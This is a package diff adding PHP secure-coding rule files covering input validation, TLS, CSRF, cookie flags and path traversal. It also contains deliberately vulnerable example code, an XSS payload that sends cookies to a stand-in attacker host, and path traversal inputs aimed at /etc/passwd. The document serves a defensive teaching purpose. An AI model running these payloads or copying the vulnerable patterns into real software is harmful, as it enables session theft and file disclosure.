@sun-asterisk/sunlint 1.3.39 → 1.3.40

package/skill-assets/sunlint-code-quality/rules/php/S025-server-validation.md

@@ -0,0 +1,63 @@
+---
+title: Always Validate Client Data Server-side
+impact: MEDIUM
+impactDescription: ensures input validation cannot be bypassed
+tags: validation, server-side, input, sanitization, security, php
+---
+
+## Always Validate Client Data Server-side
+
+Client-side validation is for UX only - it can be bypassed easily using tools like Burp Suite or even just the browser console. All input must be validated server-side to ensure the integrity and security of the application.
+
+**Incorrect (trusting client validation):**
+
+```php
+// No server validation - trusting frontend
+$amount = $_POST['amount'];
+$toAccount = $_POST['to_account'];
+
+// Attacker could pass negative amount or non-existent account
+transfer_money($currentUserId, $toAccount, $amount);
+echo json_encode(['success' => true]);
+```
+
+**Correct (comprehensive server validation):**
+
+```php
+// Standard PHP validation
+$amount = filter_var($_POST['amount'] ?? null, FILTER_VALIDATE_FLOAT);
+if ($amount === false || $amount <= 0 || $amount > 10000) {
+    http_response_code(400);
+    die(json_encode(['error' => 'Invalid amount']));
+}
+
+$toAccount = $_POST['to_account'] ?? '';
+if (!preg_match('/^[A-Z]{2}\d{18}$/', $toAccount)) {
+    http_response_code(400);
+    die(json_encode(['error' => 'Invalid account format']));
+}
+
+// Laravel Validation (Recommended)
+$validated = $request->validate([
+    'amount' => 'required|numeric|min:0.01|max:10000',
+    'to_account' => 'required|string|regex:/^[A-Z]{2}\d{18}$/'
+]);
+
+// Symfony Validation
+$constraints = new Assert\Collection([
+    'amount' => [new Assert\NotBlank(), new Assert\Range(['min' => 0.01, 'max' => 10000])],
+    'to_account' => [new Assert\NotBlank(), new Assert\Regex('/^[A-Z]{2}\d{18}$/')],
+]);
+$violations = $validator->validate($input, $constraints);
+```
+
+**Validation types:**
+
+| Type | What to Check |
+|------|---------------|
+| Format | Email (`FILTER_VALIDATE_EMAIL`), phone, UUID, dates |
+| Range | Min/max values, string length |
+| Business | Account exists, permissions, sufficient balance |
+| Sanitization | `filter_var` with `FILTER_SANITIZE_STRING`, etc. |
+
+**Tools:** Respect/Validation, Laravel Validator, Symfony Validator, SonarQube

package/skill-assets/sunlint-code-quality/rules/php/S026-tls-encryption.md

@@ -0,0 +1,48 @@
+---
+title: TLS Encryption For All Connections
+impact: CRITICAL
+impactDescription: protects data in transit and ensures server identity verification
+tags: tls, encryption, https, transport, security, php
+---
+
+## TLS Encryption For All Connections
+
+To maintain data confidentiality and integrity, all network traffic—including communication between your application and users, and between your application and internal services (databases, caches)—must be encrypted using TLS.
+
+**Incorrect (unencrypted connections):**
+
+```php
+// Plain HTTP
+file_get_contents("http://internal-service/api");
+
+// Database without TLS/SSL flags
+$dsn = "mysql:host=db.production;dbname=secret";
+$pdo = new PDO($dsn, "user", "pass");
+```
+
+**Correct (enforced TLS):**
+
+```php
+// 1. Mandatory HTTPS for all service calls
+$response = $httpClient->get("https://internal-service/api");
+
+// 2. Enforced TLS for Database
+$pdo = new PDO($dsn, "user", "pass", [
+    PDO::MYSQL_ATTR_SSL_CA    => '/etc/ssl/certs/ca-certificates.crt',
+    PDO::MYSQL_ATTR_SSL_VERIFY_SERVER_CERT => true
+]);
+
+// 3. Ensuring the PHP application knows it is behind HTTPS (for link generation)
+// In Laravel (AppServiceProvider.php)
+if (App::environment('production')) {
+    URL::forceScheme('https');
+}
+```
+
+**Global Compliance Requirements:**
+- **Redirects**: All `http://` requests must return a `301` redirect to `https://`.
+- **HSTS**: Broadly implement `Strict-Transport-Security` headers (min-age 1 year).
+- **Modern TLS**: Use TLS 1.2 or 1.3 only; disable SSLv3, TLS 1.0, and TLS 1.1.
+- **Verification**: Always verify server certificates (`verify_peer => true`). Never disable verification to "make it work" in dev environments.
+
+**Tools:** `SSLyze`, `nmap` (with ssl-enum-ciphers), `Qualys SSL Labs`, `SecurityHeaders.com`

package/skill-assets/sunlint-code-quality/rules/php/S027-mtls-validation.md

@@ -0,0 +1,62 @@
+---
+title: Validate mTLS Certificates Before Auth
+impact: CRITICAL
+impactDescription: ensures mutual identity verification between communicating services
+tags: mtls, certificates, authentication, zero-trust, security, php
+---
+
+## Validate mTLS Certificates Before Auth
+
+Mutual TLS (mTLS) provides strong authentication by requiring both the client and the server to present certificates. In PHP environments, the web server (Nginx/Apache) typically handles the handshake and passes certificate details to the application through server variables.
+
+**Incorrect (implicitly trusting or skipping validation):**
+
+```php
+// VULNERABLE: Assuming any request reaching the script is authorized
+function processInternalRequest() {
+    // No check if the client certificate was actually validated by the web server
+    $data = doTask(); 
+}
+```
+
+**Correct (validating certificate variables in PHP):**
+
+```php
+// 1. Nginx Configuration required:
+// ssl_verify_client on;
+// fastcgi_param SSL_CLIENT_S_DN $ssl_client_s_dn;
+// fastcgi_param SSL_CLIENT_VERIFY $ssl_client_verify;
+
+// 2. PHP validation logic
+function validateClientCert() {
+    // Ensure the web server actually verified the certificate
+    if (($_SERVER['SSL_CLIENT_VERIFY'] ?? '') !== 'SUCCESS') {
+        header('HTTP/1.1 403 Forbidden');
+        die("Mutual TLS authentication failed.");
+    }
+
+    // Validate the Distinguished Name (DN) or Common Name (CN)
+    $clientDn = $_SERVER['SSL_CLIENT_S_DN'] ?? '';
+    $allowedServices = ['CN=payment-service', 'CN=auth-service'];
+    
+    $isAuthorized = false;
+    foreach ($allowedServices as $service) {
+        if (strpos($clientDn, $service) !== false) {
+            $isAuthorized = true;
+            break;
+        }
+    }
+
+    if (!$isAuthorized) {
+        header('HTTP/1.1 403 Forbidden');
+        die("Service certificate not authorized.");
+    }
+}
+```
+
+**Key Implementation steps:**
+1. **Web Server**: Configure your reverse proxy (Nginx, Apache) to request client certificates and verify them against an internal Root CA.
+2. **Environment**: Pass the verification status and client DN to PHP.
+3. **Application**: Explicitly check `SSL_CLIENT_VERIFY` and optionally validate the specific identity (CN) of the calling service.
+
+**Tools:** OpenSSL, Nginx `ssl_client_certificate`, HashiCorp Vault (for CA management), Istio/Linkerd

package/skill-assets/sunlint-code-quality/rules/php/S028-upload-limits.md

@@ -0,0 +1,60 @@
+---
+title: Limit Upload File Size And Count
+impact: MEDIUM
+impactDescription: prevents Denial of Service (DoS) attacks by resource exhaustion
+tags: upload, file-size, dos, limits, security, php
+---
+
+## Limit Upload File Size And Count
+
+Allowing unlimited file uploads can quickly exhaust server disk space, memory, and bandwidth, leading to a Denial of Service (DoS). It is critical to enforce strict limits on the number of files, their size, and their types.
+
+**Incorrect (trusting default or no limits):**
+
+```php
+// Standard PHP - No manual size checking
+$file = $_FILES['avatar'];
+move_uploaded_file($file['tmp_name'], 'uploads/' . $file['name']);
+
+// VULNERABLE: No validation of count or type
+foreach ($_FILES['documents'] as $file) {
+    // Process all files without limit
+}
+```
+
+**Correct (explicit limits in PHP and Application):**
+
+```php
+/**
+ * 1. Configure PHP settings (php.ini or .user.ini)
+ * upload_max_filesize = 5M
+ * post_max_size = 8M
+ * max_file_uploads = 5
+ */
+
+// 2. Manual check in plain PHP
+$maxSize = 5 * 1024 * 1024; // 5MB
+if ($_FILES['avatar']['size'] > $maxSize) {
+    die("File exceeds size limit");
+}
+
+// 3. Using Laravel Validation (Recommended)
+$request->validate([
+    'avatar' => 'required|file|image|max:5120', // size in kilobytes
+    'documents' => 'required|array|max:5',     // max 5 files
+    'documents.*' => 'file|mimes:pdf,docx|max:10240' // max 10MB per file
+]);
+```
+
+**Recommended limits:**
+- **Images**: 2MB - 10MB
+- **Documents**: 5MB - 20MB
+- **Max Items**: 5-10 files per request.
+- **Whitelist**: Always use `mimes` or `mimetypes` validation to only allow expected extensions (e.g., `jpg, png, pdf`).
+
+**Why these limits matter?**
+- Prevents disk-filling attacks.
+- Reduces memory usage during image processing or virus scanning.
+- Minimizes the attack surface for file-based exploits.
+
+**Tools:** PHP Internal Config, Laravel Validator, Symfony Validator, Nginx `client_max_body_size`

package/skill-assets/sunlint-code-quality/rules/php/S029-csrf-protection.md

@@ -0,0 +1,65 @@
+---
+title: Apply CSRF Protection
+impact: HIGH
+impactDescription: prevents cross-site request forgery attacks
+tags: csrf, tokens, forms, security, php
+---
+
+## Apply CSRF Protection
+
+CSRF attacks force authenticated users to perform unintended actions (like changing passwords or transferring funds) without their knowledge. All state-changing requests (POST, PUT, DELETE, PATCH) must be protected.
+
+**Incorrect (no CSRF protection):**
+
+```html
+<!-- No CSRF token - vulnerable to one-click attacks -->
+<form action="/transfer.php" method="POST">
+  <input name="amount" value="1000">
+  <input name="to" value="attacker_account">
+  <button>Transfer</button>
+</form>
+```
+
+**Correct (CSRF protection):**
+
+```php
+// Standard PHP implementation
+session_start();
+if (empty($_SESSION['csrf_token'])) {
+    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
+}
+
+// On the processing side:
+if ($_SERVER['REQUEST_METHOD'] === 'POST') {
+    if (!hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
+        die("CSRF token validation failed");
+    }
+    // Process request
+}
+?>
+
+<!-- In the form -->
+<form action="/transfer.php" method="POST">
+  <input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>">
+  <input name="amount">
+  <button>Transfer</button>
+</form>
+
+<?php
+// Using Laravel (Recommended)
+// CSRF protection is enabled by default for all POST requests.
+?>
+<form method="POST" action="/transfer">
+    @csrf
+    <input name="amount">
+    <button type="submit">Transfer</button>
+</form>
+```
+
+**Protection strategies:**
+1. Use CSRF tokens for all state-changing requests.
+2. Set `SameSite=Lax` or `SameSite=Strict` on session cookies.
+3. Use custom headers (e.g., `X-Requested-With`) for AJAX requests.
+4. For APIs, use Bearer tokens (JWT/OAuth2) which are not automatically sent by browsers.
+
+**Tools:** Laravel Middleware, Symfony Form CSRF, PHPStan, SonarQube

package/skill-assets/sunlint-code-quality/rules/php/S030-directory-browsing.md

@@ -0,0 +1,40 @@
+---
+title: Disable Directory Browsing
+impact: MEDIUM
+impactDescription: prevents file enumeration and exposure of sensitive file structures
+tags: directory, listing, file-exposure, security, php
+---
+
+## Disable Directory Browsing
+
+Directory browsing (or directory listing) allows users to see all files inside a folder if no index file (like `index.php` or `index.html`) is present. This can expose sensitive files, source code backups, or temporary files to attackers.
+
+**Incorrect (directory listing enabled):**
+
+```apache
+# Apache default behavior often allows listing
+# Requests to /uploads/ show all files
+```
+
+**Correct (directory listing disabled):**
+
+```apache
+# 1. Apache (.htaccess)
+Options -Indexes
+
+# 2. Nginx
+location / {
+    autoindex off;
+}
+
+# 3. Application level (Common PHP trick)
+# Place an empty index.php in sensitive folders like /uploads or /storage
+<?php // Silence is golden
+```
+
+**Best Practices for PHP Applications:**
+- **Public Directory**: Only the `public` folder of your application should be accessible via the web server. All other code (`app`, `vendor`, `.env`) should be outside the web root.
+- **Index File**: Ensure every publicly accessible directory has an `index.php` or `index.html` file to prevent listing if server configuration fails.
+- **.htaccess**: Include `Options -Indexes` in your root `.htaccess` file if using Apache.
+
+**Tools:** Web Server Configuration (Nginx/Apache), OWASP ZAP (to detect enabled directory listing), Manual Browser Testing

package/skill-assets/sunlint-code-quality/rules/php/S031-secure-cookie-flag.md

@@ -0,0 +1,55 @@
+---
+title: Set Secure Flag On Session Cookies
+impact: HIGH
+impactDescription: prevents session cookies from being transmitted over unencrypted HTTP connections
+tags: cookies, secure, https, session, security, php
+---
+
+## Set Secure Flag On Session Cookies
+
+The `Secure` attribute ensures that cookies are only transmitted over encrypted (HTTPS) connections. Without this flag, a session cookie could be sent over a plain HTTP connection (e.g., if a user manually changes the URL to `http://`), exposing it to network eavesdroppers.
+
+**Incorrect (no Secure flag):**
+
+```php
+// Insecure: cookie will be sent over HTTP
+setcookie("session_id", $token);
+
+// In php.ini or startup
+// session.cookie_secure = 0
+```
+
+**Correct (Secure flag set):**
+
+```php
+// 1. Using setcookie (PHP 7.3+)
+setcookie("session_id", $token, [
+    'expires' => time() + 3600,
+    'path' => '/',
+    'domain' => 'example.com',
+    'secure' => true,     // Enforces HTTPS
+    'httponly' => true,
+    'samesite' => 'Strict',
+]);
+
+// 2. Setting it for the entire session (at the start of script)
+session_set_cookie_params([
+    'lifetime' => 0,
+    'path' => '/',
+    'domain' => '',
+    'secure' => true,
+    'httponly' => true,
+    'samesite' => 'Lax'
+]);
+session_start();
+
+// 3. In Laravel (config/session.php)
+'secure' => env('SESSION_SECURE_COOKIE', true),
+```
+
+**Best Practices:**
+- Always set `secure => true` in production environments.
+- Use HSTS (`Strict-Transport-Security`) headers to force the browser to use HTTPS for all future requests.
+- If your application is served via a load balancer, ensure the `X-Forwarded-Proto` header is respected so PHP correctly identifies the HTTPS connection.
+
+**Tools:** PHP Internal configuration, OWASP ZAP, Burp Suite, SonarQube

package/skill-assets/sunlint-code-quality/rules/php/S032-httponly-cookie.md

@@ -0,0 +1,54 @@
+---
+title: Set HttpOnly On Session Cookies
+impact: MEDIUM
+impactDescription: prevents session cookies from being accessed by client-side JavaScript, mitigating XSS impacts
+tags: cookies, httponly, xss, session, security, php
+---
+
+## Set HttpOnly On Session Cookies
+
+The `HttpOnly` flag prevents client-side scripts (like JavaScript) from accessing the cookie. This is a critical defense-in-depth measure against Cross-Site Scripting (XSS) attacks. If an attacker succeeds in executing JavaScript on your page, they still won't be able to steal the session cookie and hijack the session.
+
+**Incorrect (no HttpOnly flag):**
+
+```php
+// Insecure: cookie is readable via document.cookie in JavaScript
+setcookie("session_id", $token);
+
+// In php.ini or startup
+// session.cookie_httponly = 0
+```
+
+**Correct (HttpOnly flag set):**
+
+```php
+// 1. Using setcookie (PHP 7.3+)
+setcookie("session_id", $token, [
+    'httponly' => true,   // JavaScript cannot access this cookie
+    'secure' => true,
+    'samesite' => 'Strict',
+    'path' => '/',
+]);
+
+// 2. Global session configuration
+session_set_cookie_params([
+    'httponly' => true,
+    'secure' => true,
+    'samesite' => 'Lax'
+]);
+session_start();
+
+// 3. In Laravel (config/session.php)
+'http_only' => true,
+```
+
+**XSS Attack Example (Prevented by HttpOnly):**
+```javascript
+// Attacker's payload if HttpOnly is MISSING:
+fetch('https://attacker.com/steal?cookies=' + document.cookie);
+
+// If HttpOnly is ENABLED:
+// document.cookie will NOT contain the session_id
+```
+
+**Tools:** PHP Internal Config, OWASP ZAP, Browser Developer Tools (Check 'HttpOnly' column in Application/Cookies tab)

package/skill-assets/sunlint-code-quality/rules/php/S033-samesite-cookie.md

@@ -0,0 +1,52 @@
+---
+title: Set SameSite On Session Cookies
+impact: MEDIUM
+impactDescription: provides fundamental protection against CSRF (Cross-Site Request Forgery) attacks
+tags: cookies, samesite, csrf, session, security, php
+---
+
+## Set SameSite On Session Cookies
+
+The `SameSite` attribute tells the browser whether or not to send cookies with cross-site requests. Setting this to `Lax` or `Strict` provides a strong baseline defense against Cross-Site Request Forgery (CSRF) by ensuring that session cookies are only sent when the request originates from your own site.
+
+**Incorrect (no SameSite attribute):**
+
+```php
+// Insecure: defaults to browser behavior (which used to be 'None')
+setcookie("session_id", $token);
+```
+
+**Correct (SameSite set):**
+
+```php
+// 1. Using setcookie (PHP 7.3+)
+setcookie("session_id", $token, [
+    'samesite' => 'Strict', // Or 'Lax'
+    'httponly' => true,
+    'secure' => true,
+    'path' => '/',
+]);
+
+// 2. Global session configuration
+session_set_cookie_params([
+    'samesite' => 'Lax',   // Most compatible for general sites
+    'httponly' => true,
+    'secure' => true
+]);
+session_start();
+
+// 3. In Laravel (config/session.php)
+'same_site' => 'lax',
+```
+
+**SameSite Options:**
+
+| Value | Behavior | CSRF Protection |
+|-------|----------|-----------------|
+| **Strict** | Cookie is never sent on cross-site requests. | **High** |
+| **Lax** | Sent on top-level GET navigations (e.g. clicking a link). | **Medium** |
+| **None** | Always sent (requires `Secure` flag). | **None** |
+
+**Recommended:** Use `Strict` for sensitive banking/internal sites. Use `Lax` for general user-facing applications to ensure users remain logged in when arriving from external links.
+
+**Tools:** OWASP ZAP, Browser DevTools, PHP Internal configuration

package/skill-assets/sunlint-code-quality/rules/php/S034-host-prefix-cookie.md

@@ -0,0 +1,49 @@
+---
+title: Use __Host- Prefix For Cookies
+impact: MEDIUM
+impactDescription: ensures cookie is domain-locked and secure from subdomain hijacking
+tags: cookies, prefix, domain, security, php
+---
+
+## Use __Host- Prefix For Cookies
+
+The `__Host-` prefix is a special cookie naming convention enforced by modern browsers. It provides strong guarantees that the cookie is only sent to the exact host that set it, preventing session hijacking or fixation attacks initiated from subdomains.
+
+**Incorrect (standard cookie name):**
+
+```php
+// Name doesn't provide browser-level enforcement of security constraints
+setcookie("session_id", $token, ['secure' => true, 'path' => '/']);
+```
+
+**Correct (__Host- prefix):**
+
+```php
+// 1. Using setcookie (PHP 7.3+)
+setcookie("__Host-session", $token, [
+    'secure' => true,     // REQUIRED for __Host-
+    'path' => '/',        // REQUIRED for __Host-
+    'httponly' => true,
+    'samesite' => 'Strict',
+    // 'domain' => '...', // MUST NOT BE SET for __Host-
+]);
+
+// 2. In Laravel (config/session.php)
+'cookie' => '__Host-session',
+'path' => '/',
+'secure' => true,
+```
+
+**__Host- Prefix Requirements (Browser Enforced):**
+1. **Must** have the `Secure` flag.
+2. **Must** have a `Path` of `/`.
+3. **Must NOT** have a `Domain` attribute (this locks it to the exact host).
+
+**Alternative: __Secure- Prefix**
+If you need to share the cookie across subdomains, use the `__Secure-` prefix. It only requires the `Secure` flag but still communicates that the cookie is sensitive.
+
+```php
+setcookie("__Secure-id", $token, ['secure' => true, 'domain' => '.example.com']);
+```
+
+**Tools:** Web Browser Cookie Audit, SonarQube, Manual Security Review

package/skill-assets/sunlint-code-quality/rules/php/S035-app-hostnames.md

@@ -0,0 +1,49 @@
+---
+title: Host Apps On Different Hostnames
+impact: MEDIUM
+impactDescription: provides cookie and origin isolation between different environments and apps
+tags: hostname, isolation, same-origin, security, php
+---
+
+## Host Apps On Different Hostnames
+
+When multiple applications or environments (e.g., Admin and User faces) share the same hostname, they also share cookies, `localStorage`, and `sessionStorage`. This "Same-Origin" behavior allows a vulnerability in one part of the site to affect all others on that same host.
+
+**Incorrect (shared hostname):**
+
+```text
+https://company.com/blog     # Public blog
+https://company.com/portal   # Sensitive user portal
+https://company.com/admin    # Admin panel
+# All share the Same Origin!
+```
+
+**Correct (isolated hostnames):**
+
+```text
+https://blog.company.com     # Public blog
+https://portal.company.com   # Sensitive user portal
+https://admin.company.com    # Admin panel
+# Each has isolated storage and cookies
+```
+
+**Benefits of Isolation:**
+- **Cookie Security**: A session token for `portal.company.com` won't be sent automatically to `blog.company.com`.
+- **Origin Isolation**: Scripts on the blog cannot access the DOM or storage of the portal via the "Same-Origin Policy".
+- **CORS Control**: You can explicitly define which subdomains are allowed to communicate via CORS.
+
+**PHP/Laravel Implementation (CORS):**
+
+```php
+// config/cors.php
+'allowed_origins' => [
+    'https://portal.company.com',
+    'https://admin.company.com',
+],
+'supports_credentials' => true,
+```
+
+**Why it matters?**
+If an attacker finds an XSS vulnerability on your blog (`company.com/blog`), they could steal the session cookie used for your portal (`company.com/portal`) because they share the same origin. Hosting them on separate subdomains prevents this trivial bypass.
+
+**Tools:** Infrastructure planning, Nginx/Apache Virtual Hosts, Security Headers

package/skill-assets/sunlint-code-quality/rules/php/S036-internal-file-paths.md

@@ -0,0 +1,56 @@
+---
+title: Use Internal Data For File Paths
+impact: CRITICAL
+impactDescription: prevents Path Traversal and Local File Inclusion (LFI) attacks
+tags: file-path, path-traversal, lfi, input-validation, security, php
+---
+
+## Use Internal Data For File Paths
+
+Never construct file paths using raw user input. Simple strings like `../../etc/passwd` can be used by attackers to read sensitive configuration files or execute code on your server.
+
+**Incorrect (user-controlled paths):**
+
+```php
+// Path traversal vulnerability
+$page = $_GET['page'];
+include("pages/" . $page . ".php"); 
+// Attacker: ?page=../../../../etc/passwd
+
+// File download vulnerability
+$file = $_GET['file'];
+readfile("/var/www/uploads/" . $file);
+// Attacker: ?file=../config/database.php
+```
+
+**Correct (validated internal paths):**
+
+```php
+// 1. Using pathinfo/basename to strip directory separators
+$file = $_GET['file'];
+$safeName = basename($file); // strips any directory paths like ../
+
+// 2. Validate against an allowlist (Safest)
+$allowedFiles = ['report.pdf', 'invoice.pdf'];
+if (!in_array($safeName, $allowedFiles)) {
+    die("Unauthorized file access.");
+}
+
+// 3. Ensure the resolved path is within the intended directory
+$baseDir = realpath('/var/www/uploads/');
+$requestedPath = realpath($baseDir . '/' . $safeName);
+
+if ($requestedPath === false || strpos($requestedPath, $baseDir) !== 0) {
+    die("Invalid path traversal attempt.");
+}
+
+readfile($requestedPath);
+```
+
+**Security Checklist:**
+1. **Always use [`basename()`](https://www.php.net/manual/en/function.basename.php)** to extract only the filename from user input.
+2. **Use [`realpath()`](https://www.php.net/manual/en/function.realpath.php)** and verify that the resulting path still starts with your expected base directory.
+3. **Prefer internal identifiers** (e.g., download by ID from a database) instead of exposing filenames in URLs.
+4. **Disable `allow_url_include`** in `php.ini` to prevent Remote File Inclusion (RFI).
+
+**Tools:** PHPInternal Security settings, SonarQube, Semgrep, OWASP ZAP